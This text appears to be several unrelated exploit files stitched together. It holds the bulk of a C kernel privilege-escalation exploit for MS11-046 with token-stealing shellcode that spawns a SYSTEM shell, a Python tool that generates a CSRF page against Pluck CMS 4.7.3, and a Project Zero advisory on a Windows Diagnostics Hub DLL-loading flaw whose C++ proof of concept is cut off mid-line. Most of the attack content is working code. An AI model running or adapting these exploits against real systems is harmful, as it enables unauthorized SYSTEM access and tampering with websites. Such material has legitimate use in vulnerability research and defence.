ProfileTotalNonissues,
ProfileDcacheMisses,
ProfileIcacheMisses,
ProfileCacheMisses,
ProfileBranchMispredictions,
ProfileStoreInstructions,
ProfileFpInstructions,
ProfileIntegerInstructions,
Profile2Issue,
Profile3Issue,
Profile4Issue,
ProfileSpecialInstructions,
ProfileTotalCycles,
ProfileIcacheIssues,
ProfileDcacheAccesses,
ProfileMemoryBarrierCycles,
ProfileLoadLinkedIssues,
ProfileMaximum
} KPROFILE_SOURCE, *PKPROFILE_SOURCE;
typedef DWORD (WINAPI *PNTQUERYINTERVAL) (
KPROFILE_SOURCE ProfileSource,
PULONG Interval
);
typedef LONG NTSTATUS;
typedef NTSTATUS (WINAPI *PNTALLOCATE) (
HANDLE ProcessHandle,
PVOID *BaseAddress,
ULONG ZeroBits,
PULONG RegionSize,
ULONG AllocationType,
ULONG Protect
);
typedef struct _IO_STATUS_BLOCK {
union {
NTSTATUS Status;
PVOID Pointer;
};
ULONG_PTR Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Reserved[2];
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT Unknown;
USHORT LoadCount;
USHORT ModuleNameOffset;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef BOOL (WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL);
////////////////////////////////////////////////////////////////
// FUNCTIONS
////////////////////////////////////////////////////////////////
BOOL IsWow64()
{
BOOL bIsWow64 = FALSE;
LPFN_ISWOW64PROCESS fnIsWow64Process;
fnIsWow64Process = (LPFN_ISWOW64PROCESS) GetProcAddress(GetModuleHandle(TEXT("kernel32")), "IsWow64Process");
if(NULL != fnIsWow64Process)
{
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms684139(v=vs.85).aspx
if (!fnIsWow64Process(GetCurrentProcess(), &bIsWow64))
{
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
printf(" [-] Failed (error code: %d)\n", GetLastError());
return -1;
}
}
return bIsWow64;
}
////////////////////////////////////////////////////////////////
// MAIN FUNCTION
////////////////////////////////////////////////////////////////
int main(void)
{
printf("[*] MS11-046 (CVE-2011-1249) x86 exploit\n");
printf(" [*] by Tomislav Paskalev\n");
////////////////////////////////////////////////////////////////
// IDENTIFY TARGET OS ARCHITECTURE AND VERSION
////////////////////////////////////////////////////////////////
printf("[*] Identifying OS\n");
// identify target machine's OS architecture
// in case the target machine is running a 64-bit OS
if(IsWow64())
{
printf(" [-] 64-bit\n");
return -1;
}
printf(" [+] 32-bit\n");
// identify target machine's OS version
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms724451(v=vs.85).aspx
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms724832(v=vs.85).aspx
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms724833(v=vs.85).aspx
OSVERSIONINFOEX osvi;
ZeroMemory(&osvi, sizeof(OSVERSIONINFOEX));
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
GetVersionEx((LPOSVERSIONINFO) &osvi);
// define operating system version specific variables
unsigned char shellcode_KPROCESS;
unsigned char shellcode_TOKEN;
unsigned char shellcode_UPID;
unsigned char shellcode_APLINKS;
const char **securityPatchesPtr;
int securityPatchesCount;
int lpInBufferSize;
////////////////////////////////////////////////////////////////
/*
OS VERSION SPECIFIC OFFSETS
references:
http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/kthread/original.htm
http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/kthread/late52.htm
http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/kthread/current.htm
http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/eprocess/
- nt!_KTHREAD.ApcState.Process (+0x10)
0x30 (3.51);
0x34 (>3.51 to 5.1);
0x28 (late 5.2);
0x38 (6.0);
0x40 (6.1);
0x70 (6.2 and higher)
- nt!_EPROCESS.Token
0x0108 (3.51 to 4.0);
0x012C (5.0);
0xC8 (5.1 to early 5.2);
0xD8 (late 5.2);
0xE0 (6.0);
0xF8 (6.1);
0xEC (6.2 to 6.3);
0xF4
- nt!_EPROCESS.UniqueProcessId
0x94 (3.51 to 4.0);
0x9C (5.0);
0x84 (5.1 to early 5.2);
0x94 (late 5.2);
0x9C (6.0);
0xB4
- nt!_EPROCESS.ActiveProcessLinks.Flink
0x98 (3.51 to 4.0);
0xA0 (5.0);
0x88 (5.1 to early 5.2);
0x98 (late 5.2);
0xA0 (6.0);
0xB8
*/
////////////////////////////////////////////////////////////////
// in case the OS version is 5.1, service pack 3
if((osvi.dwMajorVersion == 5) && (osvi.dwMinorVersion == 1) && (osvi.wServicePackMajor == 3))
{
// the target machine's OS is Windows XP SP3
printf(" [+] Windows XP SP3\n");
shellcode_KPROCESS = '\x44';
shellcode_TOKEN = '\xC8';
shellcode_UPID = '\x84';
shellcode_APLINKS = '\x88';
const char *securityPatches[] = {"KB2503665", "KB2592799"};
securityPatchesPtr = securityPatches;
securityPatchesCount = 2;
lpInBufferSize = 0x30;
}
// in case the OS version is 5.2, service pack 2, not R2
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms724385(v=vs.85).aspx
else if((osvi.dwMajorVersion == 5) && (osvi.dwMinorVersion == 2) && (osvi.wServicePackMajor == 2) && (GetSystemMetrics(89) == 0))
{
// the target machine's OS is Windows Server 2003 SP2
printf(" [+] Windows Server 2003 SP2\n");
shellcode_KPROCESS = '\x38';
shellcode_TOKEN = '\xD8';
shellcode_UPID = '\x94';
shellcode_APLINKS = '\x98';
const char *securityPatches[] = {"KB2503665", "KB2592799", "KB2645640", "KB2975684"};
securityPatchesPtr = securityPatches;
securityPatchesCount = 4;
lpInBufferSize = 0x30;
}
// in case the OS version is 6.0, service pack 1, workstation
else if((osvi.dwMajorVersion == 6) && (osvi.dwMinorVersion == 0) && (osvi.wServicePackMajor == 1) && (osvi.wProductType == 1))
{
// the target machine's OS is Windows Vista SP1
printf(" [+] Windows Vista SP1\n");
shellcode_KPROCESS = '\x48';
shellcode_TOKEN = '\xE0';
shellcode_UPID = '\x9C';
shellcode_APLINKS = '\xA0';
const char *securityPatches[] = {"KB2503665"};
securityPatchesPtr = securityPatches;
securityPatchesCount = 1;
lpInBufferSize = 0x30;
}
// in case the OS version is 6.0, service pack 2, workstation
else if((osvi.dwMajorVersion == 6) && (osvi.dwMinorVersion == 0) && (osvi.wServicePackMajor == 2) && (osvi.wProductType == 1))
{
// the target machine's OS is Windows Vista SP2
printf(" [+] Windows Vista SP2\n");
shellcode_KPROCESS = '\x48';
shellcode_TOKEN = '\xE0';
shellcode_UPID = '\x9C';
shellcode_APLINKS = '\xA0';
const char *securityPatches[] = {"KB2503665", "KB2975684"};
securityPatchesPtr = securityPatches;
securityPatchesCount = 2;
lpInBufferSize = 0x10;
}
// in case the OS version is 6.0, no service pack*, server
// *Because Windows Server 2008 is based on the Windows NT 6.0 Service Pack 1 kernel, the RTM release is considered to be Service Pack 1;
// accordingly, the first service pack is called Service Pack 2.
// https://en.wikipedia.org/wiki/Windows_Server_2008
else if((osvi.dwMajorVersion == 6) && (osvi.dwMinorVersion == 0) && (osvi.wServicePackMajor == 1) && (osvi.wProductType != 1))
{
// the target machine's OS is Windows Server 2008
printf(" [+] Windows Server 2008\n");
shellcode_KPROCESS = '\x48';
shellcode_TOKEN = '\xE0';
shellcode_UPID = '\x9C';
shellcode_APLINKS = '\xA0';
const char *securityPatches[] = {"KB2503665"};
securityPatchesPtr = securityPatches;
securityPatchesCount = 1;
lpInBufferSize = 0x10;
}
// in case the OS version is 6.0, service pack 2, server
else if((osvi.dwMajorVersion == 6) && (osvi.dwMinorVersion == 0) && (osvi.wServicePackMajor == 2) && (osvi.wProductType != 1))
{
// the target machine's OS is Windows Server 2008 SP2
printf(" [+] Windows Server 2008 SP2\n");
shellcode_KPROCESS = '\x48';
shellcode_TOKEN = '\xE0';
shellcode_UPID = '\x9C';
shellcode_APLINKS = '\xA0';
const char *securityPatches[] = {"KB2503665", "KB2975684"};
securityPatchesPtr = securityPatches;
securityPatchesCount = 2;
lpInBufferSize = 0x08;
}
// in case the OS version is 6.1, no service pack (note: Windows Server 2008 R2 is 64-bit only)
else if((osvi.dwMajorVersion == 6) && (osvi.dwMinorVersion == 1) && (osvi.wServicePackMajor == 0))
{
// the target machine's OS is Windows 7
printf(" [+] Windows 7\n");
shellcode_KPROCESS = '\x50';
shellcode_TOKEN = '\xF8';
shellcode_UPID = '\xB4';
shellcode_APLINKS = '\xB8';
const char *securityPatches[] = {"KB2503665"};
securityPatchesPtr = securityPatches;
securityPatchesCount = 1;
lpInBufferSize = 0x20;
}
// in case the OS version is 6.1, service pack 1 (note: Windows Server 2008 R2 is 64-bit only)
else if((osvi.dwMajorVersion == 6) && (osvi.dwMinorVersion == 1) && (osvi.wServicePackMajor == 1))
{
// the target machine's OS is Windows 7 SP1
printf(" [+] Windows 7 SP1\n");
shellcode_KPROCESS = '\x50';
shellcode_TOKEN = '\xF8';
shellcode_UPID = '\xB4';
shellcode_APLINKS = '\xB8';
const char *securityPatches[] = {"KB2503665", "KB2975684"};
securityPatchesPtr = securityPatches;
securityPatchesCount = 2;
lpInBufferSize = 0x10;
}
// in case the OS version is not any of the previously checked versions
else
{
// the target machine's OS is an unsupported 32-bit Windows version
printf(" [-] Unsupported version\n");
printf(" [*] Affected 32-bit operating systems\n");
printf(" [*] Windows XP SP3\n");
printf(" [*] Windows Server 2003 SP2\n");
printf(" [*] Windows Vista SP1\n");
printf(" [*] Windows Vista SP2\n");
printf(" [*] Windows Server 2008\n");
printf(" [*] Windows Server 2008 SP2\n");
printf(" [*] Windows 7\n");
printf(" [*] Windows 7 SP1\n");
return -1;
}
////////////////////////////////////////////////////////////////
// LOCATE REQUIRED OS COMPONENTS
////////////////////////////////////////////////////////////////
printf("[*] Locating required OS components\n");
// retrieve system information
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms725506(v=vs.85).aspx
// locate "ZwQuerySystemInformation" in the "ntdll.dll" module
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms683212(v=vs.85).aspx
FARPROC ZwQuerySystemInformation;
ZwQuerySystemInformation = GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwQuerySystemInformation");
// 11 = SystemModuleInformation
// http://winformx.florian-rappl.de/html/e6d5d5c1-8d83-199b-004f-8767439c70eb.htm
ULONG systemInformation;
ZwQuerySystemInformation(11, (PVOID) &systemInformation, 0, &systemInformation);
// allocate memory for the list of loaded modules
ULONG *systemInformationBuffer;
systemInformationBuffer = (ULONG *) malloc(systemInformation * sizeof(*systemInformationBuffer));
if(!systemInformationBuffer)
{
printf(" [-] Could not allocate memory");
return -1;
}
// retrieve the list of loaded modules
ZwQuerySystemInformation(11, systemInformationBuffer, systemInformation * sizeof(*systemInformationBuffer), NULL);
// locate "ntkrnlpa.exe" or "ntoskrnl.exe" in the retrieved list of loaded modules
ULONG i;
PVOID targetKrnlMdlBaseAddr;
HMODULE targetKrnlMdlUsrSpcOffs;
BOOL foundModule = FALSE;
PSYSTEM_MODULE_INFORMATION loadedMdlStructPtr;
loadedMdlStructPtr = (PSYSTEM_MODULE_INFORMATION) (systemInformationBuffer + 1);
for(i = 0; i < *systemInformationBuffer; i++)
{
if(strstr(loadedMdlStructPtr[i].ImageName, "ntkrnlpa.exe"))
{
printf(" [+] ntkrnlpa.exe\n");
targetKrnlMdlUsrSpcOffs = LoadLibraryExA("ntkrnlpa.exe", 0, 1);
targetKrnlMdlBaseAddr = loadedMdlStructPtr[i].Base;
foundModule = TRUE;
break;
}
else if(strstr(loadedMdlStructPtr[i].ImageName, "ntoskrnl.exe"))
{
printf(" [+] ntoskrnl.exe\n");
targetKrnlMdlUsrSpcOffs = LoadLibraryExA("ntoskrnl.exe", 0, 1);
targetKrnlMdlBaseAddr = loadedMdlStructPtr[i].Base;
foundModule = TRUE;
break;
}
}
// base address of the loaded module (kernel space)
printf(" [*] Address: %#010x\n", targetKrnlMdlBaseAddr);
// offset address (relative to the parent process) of the loaded module (user space)
printf(" [*] Offset: %#010x\n", targetKrnlMdlUsrSpcOffs);
if(!foundModule)
{
printf(" [-] Could not find ntkrnlpa.exe/ntoskrnl.exe\n");
return -1;
}
// free allocated buffer space
free(systemInformationBuffer);
// determine the address of the "HalDispatchTable" process (kernel space)
// locate the offset of the "HalDispatchTable" symbol within the target module (user space)
ULONG_PTR HalDispatchTableUsrSpcOffs;
HalDispatchTableUsrSpcOffs = (ULONG_PTR) GetProcAddress(targetKrnlMdlUsrSpcOffs, "HalDispatchTable");
if(!HalDispatchTableUsrSpcOffs)
{
printf(" [-] Could not find HalDispatchTable\n");
return -1;
}
printf(" [+] HalDispatchTable\n");
printf(" [*] Offset: %#010x\n", HalDispatchTableUsrSpcOffs);
// calculate the address of "HalDispatchTable" in kernel space
// 1. identify the base address of the target module in kernel space
// 2. previous step's result [minus] the load address of the same module in user space
// 3. previous step's result [plus] the address of "HalDispatchTable" in user space
// EQUIVALENT TO:
// 1. determine RVA of HalDispatchTable
// *Relative Virtual Address - the address of an item after it is loaded into memory, with the base address of the image file subtracted from it.
// 2. previous step's result [plus] base address of target module in kernel space
ULONG_PTR HalDispatchTableKrnlSpcAddr;
HalDispatchTableKrnlSpcAddr = HalDispatchTableUsrSpcOffs - (ULONG_PTR) targetKrnlMdlUsrSpcOffs;
HalDispatchTableKrnlSpcAddr += (ULONG_PTR) targetKrnlMdlBaseAddr;
// locate "NtQueryIntervalProfile" in the "ntdll.dll" module
PNTQUERYINTERVAL NtQueryIntervalProfile;
NtQueryIntervalProfile = (PNTQUERYINTERVAL) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");
if(!NtQueryIntervalProfile)
{
printf(" [-] Could not find NtQueryIntervalProfile\n");
return -1;
}
printf(" [+] NtQueryIntervalProfile\n");
printf(" [*] Address: %#010x\n", NtQueryIntervalProfile);
// locate "ZwDeviceIoControlFile" routine in the "ntdll.dll" module
// https://msdn.microsoft.com/en-us/library/windows/hardware/ff566441(v=vs.85).aspx
FARPROC ZwDeviceIoControlFile;
ZwDeviceIoControlFile = GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwDeviceIoControlFile");
if(!ZwDeviceIoControlFile)
{
printf(" [-] Could not find ZwDeviceIoControlFile\n");
return -1;
}
printf(" [+] ZwDeviceIoControlFile\n");
printf(" [*] Address: %#010x\n", ZwDeviceIoControlFile);
////////////////////////////////////////////////////////////////
// SETUP EXPLOITATION PREREQUISITE
////////////////////////////////////////////////////////////////
printf("[*] Setting up exploitation prerequisite\n");
// initialize Winsock DLL
printf (" [*] Initialising Winsock DLL\n");
WORD wVersionRequested;
WSADATA wsaData;
int wsaStartupErrorCode;
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms632663(v=vs.85).aspx
wVersionRequested = MAKEWORD(2, 2);
// initiate the use of the Winsock DLL
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms742213(v=vs.85).aspx
wsaStartupErrorCode = WSAStartup(wVersionRequested, &wsaData);
if(wsaStartupErrorCode != 0)
{
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
printf(" [-] Failed (error code: %d)\n", wsaStartupErrorCode);
return -1;
}
printf(" [+] Done\n");
// create socket
printf(" [*] Creating socket\n");
SOCKET targetDeviceSocket = INVALID_SOCKET;
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms742212(v=vs.85).aspx
targetDeviceSocket = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
if(targetDeviceSocket == INVALID_SOCKET)
{
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
printf(" [-] Failed (error code: %ld)\n", WSAGetLastError());
return -1;
}
printf(" [+] Done\n");
// connect to a closed port
// connect to port 0 on the local machine
struct sockaddr_in clientService;
clientService.sin_family = AF_INET;
clientService.sin_addr.s_addr = inet_addr("127.0.0.1");
clientService.sin_port = htons(0);
printf(" [*] Connecting to closed port\n");
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms737625(v=vs.85).aspx
int connectResult;
connectResult = connect(targetDeviceSocket, (SOCKADDR *) &clientService, sizeof(clientService));
if (connectResult == 0)
{
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
printf (" [-] Connected (error code: %ld)\n", WSAGetLastError());
return -1;
}
printf(" [+] Done\n");
////////////////////////////////////////////////////////////////
// CREATE TOKEN STEALING SHELLCODE
////////////////////////////////////////////////////////////////
printf("[*] Creating token stealing shellcode\n");
// construct the token stealing shellcode
unsigned char shellcode[] =
{
0x52, // PUSH EDX Save EDX on the stack (save context)
0x53, // PUSH EBX Save EBX on the stack (save context)
0x33,0xC0, // XOR EAX, EAX Zero out EAX (EAX = 0)
0x64,0x8B,0x80,0x24,0x01,0x00,0x00, // MOV EAX, FS:[EAX+0x124] Retrieve current _KTHREAD structure
0x8B,0x40,shellcode_KPROCESS, // MOV EAX, [EAX+_KPROCESS] Retrieve _EPROCESS structure
0x8B,0xC8, // MOV ECX, EAX Copy EAX (_EPROCESS) to ECX
0x8B,0x98,shellcode_TOKEN,0x00,0x00,0x00, // MOV EBX, [EAX+_TOKEN] Retrieve current _TOKEN
0x8B,0x80,shellcode_APLINKS,0x00,0x00,0x00, // MOV EAX, [EAX+_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xE8,shellcode_APLINKS,0x00,0x00,0x00, // SUB EAX, _APLINKS | Retrieve EPROCESS from ActiveProcessLinks
0x81,0xB8,shellcode_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // CMP [EAX+_UPID], 0x4 | Compare UniqueProcessId with 4 (System Process)
0x75,0xE8, // JNZ/JNE ---- Jump if not zero/not equal
0x8B,0x90,shellcode_TOKEN,0x00,0x00,0x00, // MOV EDX, [EAX+_TOKEN] Copy SYSTEM _TOKEN to EDX
0x8B,0xC1, // MOV EAX, ECX Copy ECX (current process _TOKEN) to EAX
0x89,0x90,shellcode_TOKEN,0x00,0x00,0x00, // MOV [EAX+_TOKEN], EDX Copy SYSTEM _TOKEN to current process _TOKEN
0x5B, // POP EBX Pop current stack value to EBX (restore context)
0x5A, // POP EDX Pop current stack value to EDX (restore context)
0xC2,0x08 // RET 8 Return
};
printf(" [*] Shellcode assembled\n");
// allocate memory (RWE permissions) for the shellcode
printf(" [*] Allocating memory\n");
LPVOID shellcodeAddress;
shellcodeAddress = VirtualAlloc((PVOID) 0x02070000, 0x20000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
int errorCode = 0;
if(shellcodeAddress == NULL)
{
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
errorCode = GetLastError();
// in case of ERROR_INVALID_ADDRESS
if(errorCode == 487)
{
// Attempt to access invalid address
// occurs since a fixed address is being reserved
// http://stackoverflow.com/questions/21368429/error-code-487-error-invalid-address-when-using-virtualallocex
printf(" [!] Could not reserve entire range\n");
printf(" [*] Rerun exploit\n");
}
// in case of any other error
else
printf(" [-] Failed (error code: %d)\n", errorCode);
return -1;
}
printf(" [+] Address: %#010x\n", shellcodeAddress);
// copy the shellcode to the allocated memory
memset(shellcodeAddress, 0x90, 0x20000);
// place the shellcode in the middle of the NOP-filled region (cast to a byte pointer: arithmetic on LPVOID/void* is not portable C)
memcpy((PBYTE) shellcodeAddress + 0x10000, shellcode, sizeof(shellcode));
printf(" [*] Shellcode copied\n");
////////////////////////////////////////////////////////////////
// EXPLOIT THE VULNERABILITY
////////////////////////////////////////////////////////////////
printf("[*] Exploiting vulnerability\n");
// send AFD socket connect request
printf(" [*] Sending AFD socket connect request\n");
DWORD lpInBuffer[lpInBufferSize];
memset(lpInBuffer, 0, (lpInBufferSize * sizeof(DWORD)));
lpInBuffer[3] = 0x01;
lpInBuffer[4] = 0x20;
ULONG lpBytesReturned = 0;
if(DeviceIoControl(
(HANDLE) targetDeviceSocket,
0x00012007, // IOCTL_AFD_CONNECT
(PVOID) lpInBuffer, sizeof(lpInBuffer),
(PVOID) (HalDispatchTableKrnlSpcAddr + 0x6), 0x0,
&lpBytesReturned, NULL
) == 0)
{
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms679360(v=vs.85).aspx
errorCode = GetLastError();
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
// in case of ERROR_INVALID_NETNAME
if(errorCode == 1214)
{
// AFD socket connect request successful
printf(" [+] Done\n");
}
// in case of ERROR_NOACCESS
else if(errorCode == 998)
{
// AFD socket connect request unsuccessful - target is patched
printf(" [!] Target patched\n");
printf(" [*] Possible security patches\n");
for(i = 0; i < securityPatchesCount; i++)
printf(" [*] %s\n", securityPatchesPtr[i]);
return -1;
}
// in case of any other error message
else
{
// print the error code
printf(" [-] Failed (error code: %d)\n", errorCode);
return -1;
}
}
// elevate privileges of the current process
printf(" [*] Elevating privileges to SYSTEM\n");
ULONG outInterval = 0;
// https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FProfile%2FNtQueryIntervalProfile.html
NtQueryIntervalProfile(2, &outInterval);
printf(" [+] Done\n");
// spawn shell (with elevated privileges)
printf(" [*] Spawning shell\n");
// spawn SYSTEM shell within the current shell (remote shell friendly)
system ("c:\\windows\\system32\\cmd.exe /K cd c:\\windows\\system32");
// clean up and exit
printf("\n[*] Exiting SYSTEM shell\n");
WSACleanup();
return 1;
}
// EoF
# Exploit Title: Pluck CMS 4.7.3 - Add-Page Cross-Site Request Forgery
# Exploit Author: Ahsan Tahir
# Date: 18-10-2016
# Software Link: http://www.pluck-cms.org/?file=download
# Vendor: http://www.pluck-cms.org/
# Google Dork: "2005-2016. pluck is available"
# Contact: https://twitter.com/AhsanTahirAT | https://facebook.com/ahsantahiratofficial
# Website: www.ahsan-tahir.com
# Category: webapps
# Version: 4.7.3
# Tested on: [Kali Linux 2.0 | Windows 8.1]
# Email: mrahsan1337@gmail.com
import os
if os.name == 'nt':
    os.system('cls')
else:
    os.system('clear')
def csrfexploit():
    banner = '''
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==+
|  ____  _            _       ____ __  __ ____   |
| |  _ \| |_   _  ___| | __  / ___|  \/  / ___|  |
| | |_) | | | | |/ __| |/ / | |  | |\/| \___ \   |
| |  __/| | |_| | (__|   <  | |__| |  | |___) |  |
| |_|   |_|\__,_|\___|_|\_\  \____|_|  |_|____/  |
| //PluckCMS 4.7.3 Add-Post CSRF Auto-Exploiter  |
| > Exploit Author & Script Coder: Ahsan Tahir   |
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+
'''
    print banner
    url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://): "))
    title = str(raw_input(" [+] Enter the Title of the Post which you want to add by exploiting CSRF: "))
    content = raw_input(" [+] Enter the Content, which you want to add in the post by exploiting CSRF: ")
    csrfhtmlcode = '''
<html>
<!-- CSRF PoC -->
<body>
<form action="%s/admin.php?action=editpage" method="POST">
<input type="hidden" name="title" value="%s" />
<input type="hidden" name="seo_name" value="" />
<input type="hidden" name="content" value="%s" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="keywords" value="" />
<input type="hidden" name="hidden" value="no" />
<input type="hidden" name="sub_page" value="" />
<input type="hidden" name="theme" value="default" />
<input type="hidden" name="save" value="Save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
''' % (url, title, content)
    print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created."
    print " [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n"
    extension = ".html"
    name = raw_input(" Filename: ")
    filename = name + extension
    with open(filename, "w") as f:
        f.write(csrfhtmlcode)
    print " [+] Your exploit is saved as %s" % filename
    print ""
csrfexploit()
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=887
Windows: Diagnostics Hub DLL Load EoP
Platform: Windows 10 10586, not tested 8.1 Update 2 or Windows 7
Class: Elevation of Privilege
Summary:
The fix for CVE-2016-3231 is insufficient to prevent a normal user specifying an insecure agent path leading to arbitrary DLL loading at system privileges.
Description:
CVE-2016-3231 was an issue caused by passing a relative agent path name which allowed the DLL path loaded for the agent DLL to be redirected to another file. This seems to have been fixed and as far as I can tell this issue is no longer exploitable from a sandbox. However the problem is there’s an assumption that it’s not possible to write a file to the system32 directory, which technically is true but practically for this exploit false.
As I’ve blogged about before, and also submitted bugs (for example MSRC-21233), a normal user can create named streams on directories as long as they have the FILE_ADD_FILE access right to the directory. When you do this you create what looks from a path perspective to be in the parent. For example the system32\tasks folder is writable by a normal user, so you can copy a DLL to system32\tasks:abc.dll and when GetFullPathName is called the filename returned is tasks:abc.dll. When GetValidAgentPath is called it checks if this file is in system32 by using GetFileAttributes, which succeeds, and the service will proceed to load the file.
On the fixing side of things, I can’t see an obvious reason why just checking for invalid path characters in the agent path wouldn’t be sufficient (and in fact would arguably have fixed the original bug as well). Of course I think it’s slightly dodgy that you’ll load any DLL from system32, even ones which aren’t agent DLLs. You’d have to find something which was somehow exploitable in a very short time window during DllMain but it might work.
Also I wonder whether there are any legitimate uses for named streams on NTFS directories? While it’s certainly out of scope, perhaps they could only be created by admins? Or perhaps the access check shouldn’t be on the target directory but on its parent directory, where the effective file appears to be located.
Proof of Concept:
I’ve provided a PoC as a C++ source code file. You’ll also need a DLL to test load, I’ve not provided one of these but any should do, as long as it matches the bitness of the OS.
1) Compile the C++ source code file.
2) Execute the poc passing the path to the DLL you want to load in the service as a normal user.
3) It should print that the DLL was loaded successfully.
Expected Result:
The loading of a DLL fails as the path is rejected.
Observed Result:
The DLL is loaded successfully.
*/
// ExploitCollector.cpp : Defines the entry point for the console application.
//
#include <stdio.h>
#include <tchar.h>
#include <Windows.h>
#include <comdef.h>
#include <strsafe.h>
GUID CLSID_CollectorService =
{ 0x42CBFAA7, 0xA4A7, 0x47BB,{ 0xB4, 0x22, 0xBD, 0x10, 0xE9, 0xD0, 0x27, 0x00, } };
class __declspec(uuid("f23721ef-7205-4319-83a0-60078d3ca922")) ICollectionSession : public IUnknown {
public:
virtual HRESULT __stdcall PostStringToListener(REFGUID, LPWSTR) = 0;
virtual HRESULT __stdcall PostBytesToListener() = 0;
virtual HRESULT __stdcall AddAgent(LPWSTR path, REFGUID) = 0;
//.rdata:0000000180035868 dq offset ? Start@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAUtagVARIANT@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::Start(tagVARIANT *)
//.rdata:0000000180035870 dq offset ? GetCurrentResult@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJFPEAUtagVARIANT@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::GetCurrentResult(short, tagVARIANT *)
//.rdata:0000000180035878 dq offset ? Pause@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJXZ; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::Pause(void)
//.rdata:0000000180035880 dq offset ? Resume@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJXZ; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::Resume(void)
//.rdata:0000000180035888 dq offset ? Stop@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAUtagVARIANT@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::Stop(tagVARIANT *)
//.rdata:0000000180035890 dq offset ? TriggerEvent@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJW4SessionEvent@@PEAUtagVARIANT@@11@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::TriggerEvent(SessionEvent, tagVARIANT *, tagVARIANT *, tagVARIANT *)
//.rdata:0000000180035898 dq offset ? GetGraphDataUpdates@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJAEBU_GUID@@PEAUtagSAFEARRAY@@PEAUGraphDataUpdates@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::GetGraphDataUpdates(_GUID const &, tagSAFEARRAY *, GraphDataUpdates *)
//.rdata:00000001800358A0 dq offset ? QueryState@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAW4SessionState@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::QueryState(SessionState *)
//.rdata:00000001800358A8 dq offset ? GetStatusChangeEventName@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAPEAG@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::GetStatusChangeEventName(ushort * *)
//.rdata:00000001800358B0 dq offset ? GetLastError@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAJ@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::GetLastError(long *)
//.rdata:00000001800358B8 dq offset ? SetClientDelegate@EtwCollectionSession@StandardCollector@DiagnosticsHub@Mic
};
struct SessionConfiguration
{
DWORD version; // Needs to be 1
DWORD a1; // Unknown
DWORD something; // Also unknown
DWORD monitor_pid;
GUID guid;
BSTR path; // Path to a valid directory
CHAR trailing[256];
};
class __declspec(uuid("7e912832-d5e1-4105-8ce1-9aadd30a3809")) IStandardCollectorClientDelegate : public IUnknown
{
};
